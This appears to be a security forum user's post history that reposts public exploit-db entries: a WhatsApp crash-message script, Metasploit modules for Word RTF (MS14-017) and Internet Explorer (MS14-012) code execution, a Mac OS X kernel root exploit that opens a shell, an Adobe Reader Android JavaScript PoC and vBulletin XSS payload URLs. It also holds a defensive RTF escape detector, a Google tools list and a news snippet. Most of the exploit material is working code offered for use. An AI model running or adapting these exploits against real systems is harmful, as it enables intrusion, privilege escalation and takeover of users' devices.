Everything posted by Nytro

  1. Whatsapp - your LAST SEEN wasn't my fault
"Sir, I want to hack whatsapp chat? Please give me a tutorial link."
This question made me write this simple POC tutorial to hack/steal whatsapp chats from any android mobile (at an initial level). As we know, whatsapp is one of the most famous chat messengers used on mobile these days, recently acquired by facebook.
Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/32719.pdf
  2. [h=1]WhatsApp < v2.11.7 - Remote Crash[/h]

#!/usr/bin/python
#-*- coding: utf-8 -*
# Title: WhatsApp Remote Crash on non-printable characters
# Product: WhatsApp
# Vendor Homepage: http://www.whatsapp.com
# Vulnerable Version(s): 2.11.7 and prior on iOS
# Tested on: WhatsApp v2.11.7 on iPhone 5 running iOS 7.0.4
# Solution Status: Fixed by Vendor on v2.11.8
# Date: 8/04/2014
#
# Authors:
# Jaime Sánchez @segofensiva <jsanchez (at) seguridadofensiva.com>
# Pablo San Emeterio @psaneme <psaneme (at) gmail.com>
#
# Custom message with non-printable characters will crash any WhatsApp client < v2.11.7 for iOS.
# It uses Yowsup library, that provides us with the options of registration, reading/sending messages, and even
# engaging in an interactive conversation over WhatsApp protocol
#
# More info at:
# http://www.seguridadofensiva.com/2014/04/crash-en-whatsapp-para-iphone-en-versiones-inferiores-a-2.11.7.html
# See the slides of the research/talk at RootedCON 2014 at:
# http://www.slideshare.net/segofensiva/whatsapp-mentiras-y-cintas-de-video-rootedcon-2014

import argparse, sys, os, csv
from Yowsup.Common.utilities import Utilities
from Yowsup.Common.debugger import Debugger
from Yowsup.Common.constants import Constants
from Examples.CmdClient import WhatsappCmdClient
from Examples.EchoClient import WhatsappEchoClient
from Examples.ListenerClient import WhatsappListenerClient
from Yowsup.Registration.v1.coderequest import WACodeRequest
from Yowsup.Registration.v1.regrequest import WARegRequest
from Yowsup.Registration.v1.existsrequest import WAExistsRequest
from Yowsup.Registration.v2.existsrequest import WAExistsRequest as WAExistsRequestV2
from Yowsup.Registration.v2.coderequest import WACodeRequest as WACodeRequestV2
from Yowsup.Registration.v2.regrequest import WARegRequest as WARegRequestV2
from Yowsup.Contacts.contacts import WAContactsSyncRequest
import threading,time, base64

DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
COUNTRIES_CSV = "countries.csv"
DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"

######## Yowsup Configuration file #####################
# Your configuration should contain info about your login credentials to Whatsapp. This typically consist of 3 fields:\n
# phone: Your full phone number including country code, without '+' or '00'
# id: This field is used in registration calls (-r|-R|-e), and for login if you are trying to use an existing account that is setup
#     on a physical device. Whatsapp has recently deprecated using IMEI/MAC to generate the account's password in updated versions
#     of their clients. Use --v1 switch to try it anyway. Typically this field should contain the phone's IMEI if your account is setup on
#     a Nokia or an Android device, or the phone's WLAN's MAC Address for iOS devices. If you are not trying to use existing credentials
#     or want to register, you can leave this field blank or set it to some random text.
# password: Password to use for login. You obtain this password when you register using Yowsup.
######################################################

MINE_CONFIG ="config.cfg"

def getCredentials(config = DEFAULT_CONFIG):
    if os.path.isfile(config):
        f = open(config)
        phone = ""
        idx = ""
        pw = ""
        cc = ""
        try:
            for l in f:
                line = l.strip()
                if len(line) and line[0] not in ('#',';'):
                    prep = line.split('#', 1)[0].split(';', 1)[0].split('=', 1)
                    varname = prep[0].strip()
                    val = prep[1].strip()
                    if varname == "phone":
                        phone = val
                    elif varname == "id":
                        idx = val
                    elif varname =="password":
                        pw =val
                    elif varname == "cc":
                        cc = val
            return (cc, phone, idx, pw);
        except:
            pass
    return 0

def main(phone):
    credentials = getCredentials(MINE_CONFIG or DEFAULT_CONFIG )
    if credentials:
        countryCode, login, identity, password = credentials
        identity = Utilities.processIdentity(identity)
        password = base64.b64decode(password)
        # Custom message that will crash WhatsApp
        message = message = "\xf4\xaa\xde\x04\xbf"
        #print countryCode, login, identity, password
        wa = WhatsappEchoClient(phone, message)
        wa.login(login, password)

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("number", help="Phone number to send the crash message")
    parser.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true")
    args = parser.parse_args()
    Debugger.enabled = args.verbose
    main(args.number)

Source: http://www.exploit-db.com/exploits/32865/
  3. [h=1]MS14-017 Microsoft Word RTF Object Confusion[/h]

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "MS14-017 Microsoft Word RTF Object Confusion",
      'Description'    => %q{
        This module creates a malicious RTF file that when opened in vulnerable versions of
        Microsoft Word will lead to code execution. The flaw exists in how a listoverridecount
        field can be modified to treat one structure as another. This bug was originally seen
        being exploited in the wild starting in April 2014. This module was created by reversing
        a public malware sample.
      },
      'Author'         =>
        [
          'Haifei Li', # vulnerability analysis
          'Spencer McIntyre',
          'unknown' # malware author
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2014-1761'],
          ['MSB', 'MS14-017'],
          ['URL', 'http://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers'],
          ['URL', 'https://www.virustotal.com/en/file/e378eef9f4ea1511aa5e368cb0e52a8a68995000b8b1e6207717d9ed09e8555a/analysis/']
        ],
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Payload'        =>
        {
          'StackAdjustment' => -3500,
          'Space'           => 375,
          'DisableNops'     => true
        },
      'Targets'        =>
        [
          # winword.exe v14.0.7116.5000 (SP2)
          [ 'Microsoft Office 2010 SP2 English on Windows 7 SP1 English', { } ],
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => true,
      'DisclosureDate' => 'Apr 1 2014'))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.rtf'])
      ], self.class)
  end

  def exploit
    junk = rand(0xffffffff)
    rop_chain = [
      0x275de6ae, # ADD ESP,0C # RETN [MSCOMCTL.ocx]
      junk,
      junk,
      0x27594a2c, # PUSH ECX # POP ESP # AND DWORD PTR [ESI+64],0FFFFFFFB # POP ESI # POP ECX # RETN [MSCOMCTL.ocx]
      0x2758b042, # RETN [MSCOMCTL.ocx]
      0x2761bdea, # POP EAX # RETN [MSCOMCTL.ocx]
      0x275811c8, # ptr to &VirtualAlloc() [IAT MSCOMCTL.ocx]
      0x2760ea66, # JMP [EAX] [MSCOMCTL.ocx]
      0x275e0081, # POP ECX # RETN [MSCOMCTL.ocx]
      0x40000000,
      0x00100000,
      0x00003000,
      0x00000040,
      0x00001000,
      0x275fbcfc, # PUSH ESP # POP EDI # POP ESI # RETN 8 [MSCOMCTL.ocx]
      junk,
      0x275e0861, # MOV EAX,EDI # POP EDI # POP ESI # RETN [MSCOMCTL.ocx]
      junk,
      junk,
      junk,
      junk,
      0x275ebac1, # XCHG EAX,ESI # NOP # ADD EAX,MSORES+0x13000000 # RETN 4 [MSCOMCTL.ocx]
      0x275e0327, # POP EDI # RETN [MSCOMCTL.ocx]
      junk,
      0x40000000,
      0x275ceb04, # REP MOVS BYTE [EDI],BYTE [ESI] # XOR EAX,EAX # JMP MSCOMCTL!DllGetClassObject0x3860 [MSCOMCTL.ocx]
      junk,
      junk,
      junk,
      junk,
      0x40000040
    ].pack("V*")

    exploit_data = [ junk ].pack("v")
    exploit_data << rop_chain
    exploit_data << payload.encoded
    exploit_data << make_nops(exploit_data.length % 2)
    exploit_data = exploit_data.unpack("S<*")
    exploit_data = exploit_data.map { |word| " ?\\u-#{0x10000 - word}" }
    exploit_data = exploit_data.join

    template_part1 = 0x1e04
    template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2014-1761.rtf")
    template_rtf = ::File.open(template_path, 'rb')

    exploit_rtf = template_rtf.read(template_part1)
    exploit_rtf << exploit_data
    exploit_rtf << template_rtf.read

    file_create(exploit_rtf)
  end
end

Source: http://www.exploit-db.com/exploits/32793/
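The module above hides its ROP chain and payload inside the RTF body as one `\u-N` escape per little-endian 16-bit word, so the bytes never appear literally in the file. The decoder below is an added example, not part of the Metasploit module or the original post: it walks an RTF document, recovers the bytes each `\uN` control word carries (N taken modulo 65536, which is what makes out-of-range values like `\u-65280` meaningful to the reader) and flags long runs of escapes whose values fall outside the signed 16-bit range that RTF actually defines. The run-length threshold and both sample documents are constructed assumptions for this example.

```python
import re
import struct
from typing import List, Tuple

# An RTF unicode control word: backslash, 'u', optional sign, decimal digits.
# The optional space ends the control word; the optional '?' is the fallback
# character a reader shows when it cannot display the code point.
_UNICODE_ESCAPE = re.compile(rb"\\u(-?\d+) ?\??")

# RTF defines \uN only for signed 16-bit N; anything beyond that relies on the
# reader wrapping the value, which legitimate documents have no reason to do.
_SIGNED16_MIN, _SIGNED16_MAX = -32768, 32767

# Assumed threshold: benign documents rarely emit this many escapes back to back.
SUSPICIOUS_RUN = 32


def decode_unicode_escapes(rtf: bytes) -> bytes:
    """Reassemble the 16-bit words carried by every \\uN escape, little-endian.
    This inverts the unpack("S<*") / "\\u-(0x10000 - word)" step of the module."""
    out = bytearray()
    for m in _UNICODE_ESCAPE.finditer(rtf):
        word = int(m.group(1)) % 0x10000  # wrap negative or oversized N into 0..65535
        out += struct.pack("<H", word)
    return bytes(out)


def find_escape_runs(rtf: bytes, min_run: int = SUSPICIOUS_RUN) -> List[Tuple[int, int, int]]:
    """Return (offset, escape_count, out_of_range_count) for each run of consecutive
    \\uN escapes at least min_run long. Escapes separated only by whitespace or '?'
    fallback characters count as consecutive; any other text ends the run."""
    runs = []
    cur_start, cur_count, cur_oor, last_end = None, 0, 0, None
    for m in _UNICODE_ESCAPE.finditer(rtf):
        gap = rtf[last_end:m.start()] if last_end is not None else b""
        contiguous = last_end is not None and gap.strip(b" \r\n\t?") == b""
        if not contiguous:
            if cur_count >= min_run:
                runs.append((cur_start, cur_count, cur_oor))
            cur_start, cur_count, cur_oor = m.start(), 0, 0
        n = int(m.group(1))
        cur_count += 1
        if n < _SIGNED16_MIN or n > _SIGNED16_MAX:
            cur_oor += 1
        last_end = m.end()
    if cur_count >= min_run:
        runs.append((cur_start, cur_count, cur_oor))
    return runs


def is_suspicious(rtf: bytes) -> bool:
    """Flag a document whose long escape runs contain out-of-range \\uN values."""
    return any(oor > 0 for _, _, oor in find_escape_runs(rtf))


# Constructed samples (not real documents). BENIGN_RTF uses \uN the way Word does
# for accented and typographic characters; ENCODED_BLOB_RTF carries b"ABCD" * 20 in
# the " ?\u-N" form the module emits (0x4241 -> -48575, 0x4443 -> -48061).
BENIGN_RTF = b"{\\rtf1\\ansi Caf\\u233? and \\u8217?quoted\\u8217? text\\par}"
ENCODED_BLOB_RTF = (b"{\\rtf1\\ansi\\deff0 Cover text\\par\n"
                    + b" ?\\u-48575 ?\\u-48061" * 20
                    + b"\\par}")

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_RTF), ("encoded", ENCODED_BLOB_RTF)):
        print(name, "suspicious:", is_suspicious(doc),
              "runs:", find_escape_runs(doc, min_run=2),
              "decoded:", decode_unicode_escapes(doc)[:8])
```

The recovered byte stream from a flagged run can be handed to a disassembler or compared against the gadget addresses listed in the module; the benign sample shows why the check is on runs of out-of-range values rather than on the presence of `\u` escapes alone.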
  4. [h=1]Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation Exploit[/h]

/*
 * Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount Privilege Escalation Exploit
 * CVE None
 * by Kenzley Alphonse <kenzley [dot] alphonse [at] gmail [dot] com>
 *
 *
 * Notes:
 * This exploit leverage a stack overflow vulnerability to escalate privileges.
 * The vulnerable function nfs_convert_old_nfs_args does not verify the size
 * of a user-provided argument before copying it to the stack. As a result by
 * passing a large size, a local user can overwrite the stack with arbitrary
 * content.
 *
 * Tested on Max OS X Lion xnu-1699.22.73 (x86_64)
 * Tested on Max OS X Lion xnu-1699.32.7 (x86_64)
 *
 * Greets to taviso, spender, joberheide
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset */
#include <strings.h>
#include <errno.h>
#include <sys/mman.h>
#include <sys/mount.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/** change these to fit your environment if needed **/
#define SSIZE (536)

/** struct user_nfs_args was copied directly from "/bsd/nfs/nfs.h" of the xnu kernel **/
struct user_nfs_args {
    int version;                                 /* args structure version number */
    char* addr __attribute__((aligned(8)));      /* file server address */
    int addrlen;                                 /* length of address */
    int sotype;                                  /* Socket type */
    int proto;                                   /* and Protocol */
    char * fh __attribute__((aligned(8)));       /* File handle to be mounted */
    int fhsize;                                  /* Size, in bytes, of fh */
    int flags;                                   /* flags */
    int wsize;                                   /* write size in bytes */
    int rsize;                                   /* read size in bytes */
    int readdirsize;                             /* readdir size in bytes */
    int timeo;                                   /* initial timeout in .1 secs */
    int retrans;                                 /* times to retry send */
    int maxgrouplist;                            /* Max. size of group list */
    int readahead;                               /* # of blocks to readahead */
    int leaseterm;                               /* obsolete: Term (sec) of lease */
    int deadthresh;                              /* obsolete: Retrans threshold */
    char* hostname __attribute__((aligned(8)));  /* server's name */
    /* NFS_ARGSVERSION 3 ends here */
    int acregmin;                                /* reg file min attr cache timeout */
    int acregmax;                                /* reg file max attr cache timeout */
    int acdirmin;                                /* dir min attr cache timeout */
    int acdirmax;                                /* dir max attr cache timeout */
    /* NFS_ARGSVERSION 4 ends here */
    uint auth;                                   /* security mechanism flavor */
    /* NFS_ARGSVERSION 5 ends here */
    uint deadtimeout;                            /* secs until unresponsive mount considered dead */
};

/** sets the uid for the current process and safely exits from the kernel**/
static void r00t_me() {
    asm(
        // padding
        "nop; nop; nop; nop;"
        // task_t %rax = current_task()
        "movq %%gs:0x00000008, %%rax;"
        "movq 0x00000348(%%rax), %%rax;"
        // proc %rax = get_bsdtask_info()
        "movq 0x000002d8(%%rax),%%rax;"
        // ucred location at proc
        "movq 0x000000d0(%%rax),%%rax;"
        // uid = 0
        "xorl %%edi, %%edi;"
        "movl %%edi, 0x0000001c(%%rax);"
        "movl %%edi, 0x00000020(%%rax);"
        // fix the stack pointer and return (EACCES)
        "movq $13, %%rax;"
        "addq $0x00000308,%%rsp;"
        "popq %%rbx;"
        "popq %%r12;"
        "popq %%r13;"
        "popq %%r14;"
        "popq %%r15;"
        "popq %%rbp;"
        "ret;"
        :::"%rax"
    );
}

int main(int argc, char ** argv) {
    struct user_nfs_args xdrbuf;
    char * path;
    char obuf[SSIZE];

    /** clear the arguments **/
    memset(&xdrbuf, 0x00, sizeof(struct user_nfs_args));
    memset(obuf, 0x00, SSIZE);

    /** set up variable to get path to vulnerable code **/
    xdrbuf.version = 3;
    xdrbuf.hostname = "localhost";
    xdrbuf.addrlen = SSIZE;
    xdrbuf.addr = obuf;

    /** set ret address **/
    *(unsigned long *)&obuf[528] = (unsigned long) (&r00t_me + 5);
    printf(" [*] set ret = 0x%.16lx\n", *(unsigned long *)&obuf[528]);

    /** create a unique tmp name **/
    if ((path = tmpnam(NULL)) == NULL) {
        // path can be any directory which we have read/write/exec access
        // but I'd much rather create one instead of searching for one
        perror("[-] tmpnam");
        exit(EXIT_FAILURE);
    }

    /** make the path in tmp so that we can use it **/
    if (mkdir(path, 0660) < 0) {
        perror("[-] mkdir");
        exit(EXIT_FAILURE);
    }

    /** inform the user that the path was created **/
    printf(" [*] created sploit path%s\n", path);

    /** call the vulnerable function **/
    if (mount("nfs", path, 0, &xdrbuf) < 0) {
        if (errno == EACCES) {
            puts("[+] escalating privileges...");
        } else {
            perror("[-] mount");
        }
    }

    /** clean up tmp dir **/
    if (rmdir(path) < 0) {
        perror("[-] rmdir");
    }

    /** check if privs are equal to root **/
    if (getuid() != 0) {
        puts("[-] priviledge escalation failed");
        exit(EXIT_FAILURE);
    }

    /** get root shell **/
    printf("[+] We are now uid=%i ... your welcome!\n", getuid());
    printf("[+] Dropping a shell.\n");
    execl("/bin/sh", "/bin/sh", NULL);

    return 0;
}

Source: http://www.exploit-db.com/exploits/32813/
  5. [h=1]Adobe Reader for Android 11.1.3 - Arbitrary JavaScript Execution[/h]

------------------------------------------------------------------------
Adobe Reader for Android exposes insecure Javascript interfaces
------------------------------------------------------------------------
Yorick Koster, April 2014

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
Adobe Reader for Android [2] exposes several insecure Javascript interfaces. This issue can be exploited by opening a malicious PDF in Adobe Reader. Exploiting this issue allows for the execution of arbitrary Java code, which can result in a compromise of the documents stored in Reader and files stored on SD card.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on Adobe Reader for Android version 11.1.3.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Adobe released version 11.2.0 of Adobe Reader that adds @JavascriptInterface [3] annotations to public methods that should be exposed in the Javascript interfaces. In addition, the app now targets API Level 17 and contains a static method (shouldInitializeJavaScript()) that is used to check the device's Android version.

[url]http://www.securify.nl/advisory/SFY20140401/reader_11.2.0_release_notes.png[/url]
Figure 1: Adobe Reader for Android 11.2.0 release notes

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Adobe Reader for Android allows users to work with PDF documents on an Android tablet or phone. According to Google Play, the app is installed on 100 million to 500 million devices.

The following classes expose one or more Javascript interfaces:
- ARJavaScript
- ARCloudPrintActivity
- ARCreatePDFWebView

The app targets API Level 10, which renders the exposed Javascript interfaces vulnerable to code execution - provided that an attacker manages to run malicious Javascript code within Adobe Reader.

------------------------------------------------------------------------
PDF Javascript APIs
------------------------------------------------------------------------
It appears that Adobe Reader for Mobile supports [4] a subset of the Javascript for Acrobat APIs. For some reason the exposed Javascript objects are prefixed with an underscore character.

public class ARJavaScript
{
[...]
  public ARJavaScript(ARViewerActivity paramARViewerActivity)
  {
[...]
    this.mWebView.addJavascriptInterface(new ARJavaScriptInterface(this), "_adobereader");
    this.mWebView.addJavascriptInterface(new ARJavaScriptApp(this.mContext), "_app");
    this.mWebView.addJavascriptInterface(new ARJavaScriptDoc(), "_doc");
    this.mWebView.addJavascriptInterface(new ARJavaScriptEScriptString(this.mContext), "_escriptString");
    this.mWebView.addJavascriptInterface(new ARJavaScriptEvent(), "_event");
    this.mWebView.addJavascriptInterface(new ARJavaScriptField(), "_field");
    this.mWebView.setWebViewClient(new ARJavaScript.1(this));
    this.mWebView.loadUrl("file:///android_asset/javascript/index.html");
  }

An attacker can create a specially crafted PDF file containing Javascript that runs when the target user views (or interacts with) this PDF file. Using any of the Javascript objects listed above provides the attacker access to the public Reflection APIs inherited from Object. These APIs can be abused to run arbitrary Java code.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The following proof of concept [5] will create a text file in the app sandbox.

function execute(bridge, cmd) {
  return bridge.getClass().forName('java.lang.Runtime')
    .getMethod('getRuntime',null).invoke(null,null).exec(cmd);
}

if(window._app) {
  try {
    var path = '/data/data/com.adobe.reader/mobilereader.poc.txt';
    execute(window._app, ['/system/bin/sh','-c','echo \"Lorem ipsum\" > ' + path]);
    window._app.alert(path + ' created', 3);
  } catch(e) {
    window._app.alert(e, 0);
  }
}

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] [url]http://www.securify.nl/advisory/SFY20140401/adobe_reader_for_android_exposes_insecure_javascript_interfaces.html[/url]
[2] [url]https://play.google.com/store/apps/details?id=com.adobe.reader[/url]
[3] [url]http://developer.android.com/reference/android/webkit/JavascriptInterface.html[/url]
[4] [url]http://www.adobe.com/devnet-docs/acrobatetk/tools/Mobile/js.html#supported-javascript-apis[/url]
[5] [url]http://www.securify.nl/advisory/SFY20140401/mobilereader.poc.pdf[/url]

Source: http://www.exploit-db.com/exploits/32884/
  6. [h=1]MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free[/h]

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free",
      'Description'    => %q{
        This module exploits an use after free condition on Internet Explorer as used in the wild
        on the "Operation SnowMan" in February 2014. The module uses Flash Player 12 in order to
        bypass ASLR and finally DEP.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Vulnerability discovery and Exploit in the wild
          'Jean-Jamil Khalife', # Exploit
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2014-0322' ],
          [ 'MSB', 'MS14-012' ],
          [ 'BID', '65551' ],
          [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html'],
          [ 'URL', 'http://hdwsec.fr/blog/CVE-2014-0322.html' ]
        ],
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Payload'        =>
        {
          'Space'          => 960,
          'DisableNops'    => true,
          'PrependEncoder' => stack_adjust
        },
      'BrowserRequirements' =>
        {
          :source       => /script|headers/i,
          :os_name      => Msf::OperatingSystems::WINDOWS,
          :os_flavor    => Msf::OperatingSystems::WindowsVersions::SEVEN,
          :ua_name      => Msf::HttpClients::IE,
          :ua_ver       => '10.0',
          :mshtml_build => lambda { |ver| ver.to_i < 16843 },
          :flash        => /^12\./
        },
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'migrate -f',
          'Retries' => false
        },
      'Targets'        =>
        [
          [ 'Windows 7 SP1 / IE 10 / FP 12', { } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 13 2014",
      'DefaultTarget'  => 0))
  end

  def stack_adjust
    adjust = "\x64\xa1\x18\x00\x00\x00"      # mov eax, fs:[0x18 # get teb
    adjust << "\x83\xC0\x08"                 # add eax, byte 8 # get pointer to stacklimit
    adjust << "\x8b\x20"                     # mov esp, [eax] # put esp at stacklimit
    adjust << "\x81\xC4\x30\xF8\xFF\xFF"     # add esp, -2000 # plus a little offset

    adjust
  end

  def create_swf
    path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0322", "AsXploit.swf" )
    fd = ::File.open( path, "rb" )
    swf = fd.read(fd.stat.size)
    fd.close

    return swf
  end

  def exploit
    @swf = create_swf
    super
  end

  def on_request_uri(cli, request)
    print_status("Request: #{request.uri}")
    if request.uri =~ /\.swf$/
      print_status("Sending SWF...")
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
      return
    end
    super
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Sending HTML...")
    send_exploit_html(cli, exploit_template(cli, target_info))
  end

  def exploit_template(cli, target_info)
    flash_payload = ""
    get_payload(cli,target_info).unpack("V*").each do |i|
      flash_payload << "0x#{i.to_s(16)},"
    end
    flash_payload.gsub!(/,$/, "")

    html_template = %Q|
<html>
<head>
</head>
<body>
<script>
var g_arr = [];
var arrLen = 0x250;

function dword2data(dword)
{
  var d = Number(dword).toString(16);
  while (d.length < 8)
    d = '0' + d;
  return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));
}

function eXpl()
{
  var a=0;
  for (a=0; a < arrLen; a++) {
    g_arr[a] = document.createElement('div');
  }

  var b = dword2data(0x19fffff3);
  while (b.length < 0x360) {
    if (b.length == (0x98 / 2)) {
      b += dword2data(0x1a000010);
    } else if (b.length == (0x94 / 2)) {
      b += dword2data(0x1a111111);
    } else if (b.length == (0x15c / 2)) {
      b += dword2data(0x42424242);
    } else {
      b += dword2data(0x19fffff3);
    }
  }

  var d = b.substring(0, ( 0x340 - 2 )/2);

  try{
    this.outerHTML=this.outerHTML
  } catch(e){ }

  CollectGarbage();

  for (a=0; a < arrLen; a++) {
    g_arr[a].title = d.substring(0, d.length);
  }
}

function trigger()
{
  var a = document.getElementsByTagName("script");
  var b = a[0];
  b.onpropertychange = eXpl;
  var c = document.createElement('SELECT');
  c = b.appendChild(c);
}
</script>
<embed src=#{rand_text_alpha(4 + rand(3))}.swf FlashVars="version=<%=flash_payload%>" width="10" height="10"> </embed>
</body>
</html>
|

    return html_template, binding()
  end
end

Source: MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free
  7. How Sercomm saved my Easter! Another backdoor in my router: when Christmas is NOT enough!
Released 18/04/2014 by Eloi Vanderbeken - Synacktiv
Download: http://www.synacktiv.com/ressources/TCP32764_backdoor_again.pdf
  8. [h=1]14 Google Tools You Didn't Know Existed[/h]

[h=2]1. Google Ngram Viewer[/h]
Google's Ngram Viewer lets you search keywords in millions of books over the span of half a millennium, a useful tool for finding trends over time. For power users, the Ngram Viewer also has advanced options, such as searching for particular keywords as specific parts of speech or combining keywords. Just in case you ever wanted to see how big cocaine was in Victorian times, now you can.
Screenshot courtesy of Google Ngram Viewer.

[h=2]2. Google Correlate[/h]
A part of Google Trends, Google Correlate allows you to look at search trends over time. For example, input "soup" and you'll see a clear increase in searches during the winter months. The more fascinating part of Google Correlate is the Search by Drawing function. Draw a fun graph and Correlate will give you search keywords that best match your graph creation.
Screenshot courtesy of Google Correlate.

[h=2]3. Google Trends[/h]
Look at trends in hot searches with Google Trends. Browse by date, or look at top searches in different categories with the new Top Charts function. Finally, with the Explore function, input a search term and see how it trended over time and location. You can also now view popular searches in a colorful fullscreen format.
Screenshot courtesy of Google Trends.

[h=2]4. Google Think Insights[/h]
Home to an abundance of resources, Google Think Insights is a useful tool for entrepreneurs and industry professionals. There are case studies, new findings and tips on how to grow your business, as well as showcases of exemplary projects. Finally, there are also tools for maximizing your site analytics and ad campaigns. A particularly useful collection is how to "Make Your Website Work Across Different Platforms."
Screenshot courtesy of Google Think Insights.

[h=2]5. Google Public Data Explorer[/h]
Search through databases from around the world, including the World Bank, OECD, Eurostat and the U.S. Census Bureau. After you find what you want, filter through categories to make graphs with the axes you want. Google's Public Data Explorer then displays the data in a line graph, bar graph, scatterplot or on a map.
Screenshot courtesy of Google Public Data Explorer.

[h=2]6. Full Value of Mobile[/h]
A useful calculator for businesses, Google's Full Value of Mobile will calculate just how much having a mobile site is worth. The tool will help you analyze how customers interact with the various aspects of your business, from mobile sites to calls to cross-device ability.
Screenshot courtesy of Full Value of Mobile.

[h=2]7. Get Your Business Online[/h]
Get Your Business Online is Google's initiative to get more local businesses on the web, in an effort to boost the local economy as well as help small businesses grow. The initiative also encourages people to get other businesses online, with an end goal of reaching every local business in America. There are also listings for events and lessons. The free service also includes hosting for one year.
Screenshot courtesy of Get Your Business Online.

[h=2]8. Webmaster Tools[/h]
Google's Webmaster Tools allows webmasters to monitor a site's health and traffic. Additional tools include a Structured Data Markup Helper and Google Places for Business.
Video: YouTube, GoogleWebmasterHelp

[h=2]9. Schemer[/h]
Schemer is like a combination to-do list and social event planning app. Connect via your Google+ account, enter your preferences, and Schemer will offer some things to do around your area. A great tool for travelers who want to make the most out of a visit, as well as for locals who want to find something to do on an otherwise boring day. You can also collaborate with the friends in your Google+ Circles and see who wants to do the same things as you.
Screenshot courtesy of Schemer.

[h=2]10. Google Fonts[/h]
Google Fonts offers open source web fonts for all to use privately or commercially. As of now, there are 629 font families available. Filter fonts by thickness, slant, width and script.
Screenshot courtesy of Google Fonts.

[h=2]11. Google Developers[/h]
Google Developers houses a plethora of resources that developers can use, tools such as internationalizing different websites and live presentations of tutorials. Developers can also join groups in a local area for meetups and collaboration.
Screenshot courtesy of Google Developers.

[h=2]12. Dart[/h]
Dart is a programming language developed by Google in hopes of eventually replacing JavaScript as the language of modern web apps. Dart was released in 2011 and is still in its development stages. With a goal to make coding and collaboration simpler, Dart was designed to be simple enough that even beginning developers could learn from it.
Screenshot courtesy of Dart.

[h=2]13. Google Keep[/h]
Launched earlier this year, the Google Keep app connects to your Google Drive. Sync-able across all your devices, Google Keep allows you to keep notes, voice memos, pictures and checklists in order. The easy-to-use interface is a simple app for those looking to do basic note-keeping on-the-go.
Video: YouTube, GoogleMobile

[h=2]14. Google Sky[/h]
A part of Google Earth, Google Sky allows you to explore space and star systems. In collaboration with NASA, using images from the Hubble Telescope, Google Sky is one of three subsidiaries of Google Earth, the others being Google Mars and Google Moon.
Screenshot courtesy of Google Sky.

Source: 14 Google Tools You Didn't Know Existed
  9. Packetstorm: vBulletin 5.1 Cross Site Scripting - Packet Storm
  10. Exploit Title: vBulletin 5.1 Multiple XSS vulnerabilities
Authors: Romanian Security Team
Website: https://rstforums.com/forum/
Date published: 19 April 2014
Software: vBulletin
Version: 5.1.1 Alpha 9

[XSS] Random topic
- https://website.com/[forum_path]/forum/anunturi-importante/rst-power/67030-rst-admin-restore?view=stream1337";alert(123);//

[XSS] New private message
- https://website.com/[forum_path]/privatemessage/new/9999"><input onfocus=alert(1) autofocus>

[XSS] View PM: you must know or bruteforce private message ID (830372)
- https://website.com/[forum_path]/privatemessage/view/830372?folderid=random";alert(1);//

[DOM XSS] Help
- https://website.com/[forum_path]/help#'"><img src=x onerror=prompt("PoC")>

(c) Romanian Security Team 2014
  11. Disable the signatures, will you.
  12. The story of the three Romanian hackers who managed to break into the security systems of American retailers
Author: Luciana Georgescu

The US Secret Service and the FBI want to use the case of 3 Romanian hackers involved in electronic fraud operations against American retailers as an example for the investigations currently under way into the leak of data from the database of Target Corp. 40,000 million credit and debit cards were affected by last year's data leak in the USA, Bloomberg writes.

